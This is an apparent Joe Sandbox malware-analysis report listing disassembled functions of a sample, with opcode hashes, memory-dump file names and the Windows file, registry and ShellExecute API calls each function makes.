Opcode ID: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction ID: e1a0b165b1ec2cfc9f877bfb9dcbf2309f9cd93107b4533ef6724984480a2cde
Opcode Fuzzy Hash: c7b88453d07393fdeb677dd88dae3b78eedf61d9a77563a8484cf44dd47aba53
Instruction Fuzzy Hash: 2A913370D00229CBDF28CFA8C844BADBBB1FF44305F15816AD856BB281C779A986DF45

Function 00406B93 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction ID: 37e0958252648d02cff52253bcfdfe32609a82ce416cf41b7e12165f3d842d3a
Opcode Fuzzy Hash: 4cabeb7f0ac32f2dbf9dc68cead907101fe434422346ba396ff6a4e1791945c5
Instruction Fuzzy Hash: 3A814571D04228CFDF24CFA8C944BADBBB1FB44305F25816AD456BB281C7789A96CF45

Function 00406AE6 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction ID: 661ade8e8f79e5a6005bf83598ee02ccf2e60dcd73e05bd09c6951c965a298a8
Opcode Fuzzy Hash: f41dab0dbba64a540d9551cbe01a5d5f92f5b5317ed5009a96d4fab12e5207c8
Instruction Fuzzy Hash: DC713471D00228CFDF24CFA8C944BADBBB1FB48305F25816AD846B7281D7799A96DF44

Function 00406C04 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction ID: d698c6254bb21e10e407083827577a24b67810c044b8fa2104370265796c5121
Opcode Fuzzy Hash: 27edfd15d06558e6ae5c336135e48ef31f60b588342a43fc4fa727b2134efb1b
Instruction Fuzzy Hash: C3714571D04228CFDF28CFA8C844BADBBB1FB48305F25816AD856B7281C7785956DF45

Function 00406B50 Relevance: 5.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction ID: 46d523a662c7919231ebab16691ba05348c69527c8d8aa00e9837d4009f14a99
Opcode Fuzzy Hash: e3d564453c2182c562a1b6ec6fca3cbebf624123e7e397cf1c44fef12d2f9579
Instruction Fuzzy Hash: 28714571D00228DBDF28CF98C944BADBBB1FF44305F21816AD856BB281C778AA56DF44

Function 00401FC3 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction ID: be163213bf01efc0596bf906ca0f1611b6abe1a57da7fca01b5cdd0d3cce8cbe
Opcode Fuzzy Hash: 8fcd44a165ceb9b3c7ca3aadaa3b6318a37a053de054dbdc544eae6363f814e6
Instruction Fuzzy Hash: 4921C631900219EBCF20AFA5CE48A9E7E71BF00354F60427BF501B51E1CBBD8A81DA5E

Function 004021EA Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004064C6: FindFirstFileW.KERNELBASE(771B3420,00426798,00425F50,00405C88,00425F50,00425F50,00000000,00425F50,00425F50,771B3420,?,771B2EE0,00405994,?,771B3420,771B2EE0), ref: 004064D1
Part of subcall function 004064C6: FindClose.KERNEL32(00000000), ref: 004064DD

lstrlenW.KERNEL32 ref: 0040222A
lstrlenW.KERNEL32(00000000), ref: 00402235
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FileFindlstrlen$CloseFirstOperation
String ID:
API String ID: 1486964399-0
Opcode ID: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction ID: c84e55253e39239becd36fe695d6eaeea1e53b9ed95ff09ccc99126e74603a36
Opcode Fuzzy Hash: f0a18f43b2fd03918ce55f1a207086b2750e482e6a70c5afb59815244b6eb2cd
Instruction Fuzzy Hash: C011707190031896CB10EFF98E4999EB7B8AF14314F10847FA905FB2D9D6B8D9418B59

Function 0040249E Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: Enum$CloseOpenValue
String ID:
API String ID: 167947723-0
Opcode ID: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction ID: f7d1df95d760c65b2fa1112c316253173fa515e4752bf04adbc10342b079e70f
Opcode Fuzzy Hash: 6484ca5ed5e76b4549c4ba381c39e577598ee1135ee5e1483c34ecd9ae314918
Instruction Fuzzy Hash: 12F08171A00204EBEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69

Function 00401E08 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\magmaet\clenched,?), ref: 00401E52

Strings

C:\Users\user\AppData\Local\magmaet\clenched, xrefs: 00401E3B

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: ExecuteShell
String ID: C:\Users\user\AppData\Local\magmaet\clenched
API String ID: 587946157-3268208382
Opcode ID: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction ID: 6f03a3129deb64bde54e8dcd59ef9069cb9fc2feb89592f518e75193bcf3d7b7
Opcode Fuzzy Hash: abdb6d04a8628e8e10e6f0e4e307bd878a3efa8eec47d48165f605e3d5e5f129
Instruction Fuzzy Hash: ACF0C236B00100AACB11AFB99E4AEAD33B9AB44724B240577F901F74D5DAFC89419618

Function 00405E0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040D604,teProcessW,004032EF,teProcessW,0040D604,00414EF0,00004000,?,00000000,00403119,00000004), ref: 00405E1E

Strings

teProcessW, xrefs: 00405E0A

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FileWrite
String ID: teProcessW
API String ID: 3934441357-2825860339
Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction ID: 23ec5f7379bf279edb3dbb3262258d5736cfdadd2d5b14d2449b9c6e52f850f2
Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
Instruction Fuzzy Hash: 4DE08C3224021EABCF109F50CC08EEB3B6CEB00360F044432FA99E2080D230EA209BE4

Function 00405DDB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,teProcessW,0040336B,?,?,0040326F,00414EF0,00004000,?,00000000,00403119), ref: 00405DEF

Strings

teProcessW, xrefs: 00405DDB

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FileRead
String ID: teProcessW
API String ID: 2738559852-2825860339
Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction ID: 619b4f5876fe922fe119770d1c4b6382a551d6d1c0a67235faeb4c306daddfa0
Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
Instruction Fuzzy Hash: BAE08C3220021AABCF10AF90CC04AEB3B6CEB083A0F004833F951E3140D230E9618BE4

Function 004030E7 Relevance: 3.1, APIs: 2, Instructions: 88COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,0040A230,?,00403093,000000FF,00000000,00000000,?,?), ref: 0040310C

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction ID: 67d9160ce0aa1e2e76d61ceadf7dfe4382c4b6927c35e4cb0672809be5a1f01d
Opcode Fuzzy Hash: 018d308ea692820c8829675fa6e34eac859b76ea50dec8528c81e60ce8839cd5
Instruction Fuzzy Hash: 2D316D30200219EBDB109F55DD84ADA3E68EB08359B10843BF905EA1D0D779DF50DBA9

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.ADVAPI32(?,?,?,artikulationer\Udsorteringerne,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Azygoses125.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction ID: e180782171dce9fa6fade52b03e39cf5b39f26fab5a396fb1bde1b9fb5ac53b7
Opcode Fuzzy Hash: c6e0b2e8dbd325c6a63e6ba070a9d5cf510bd218eb5002d0b1f80879fa38eeb3
Instruction Fuzzy Hash: 2111A331911205EBDB10CFA0CB489BEB7B4EF44354F20843FE446B72D0D6B85A41DB19

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000003.00000002.1335602414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1335573727.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335624585.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000413000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000042C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.0000000000434000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335663821.000000000044B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1335928358.000000000044F000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

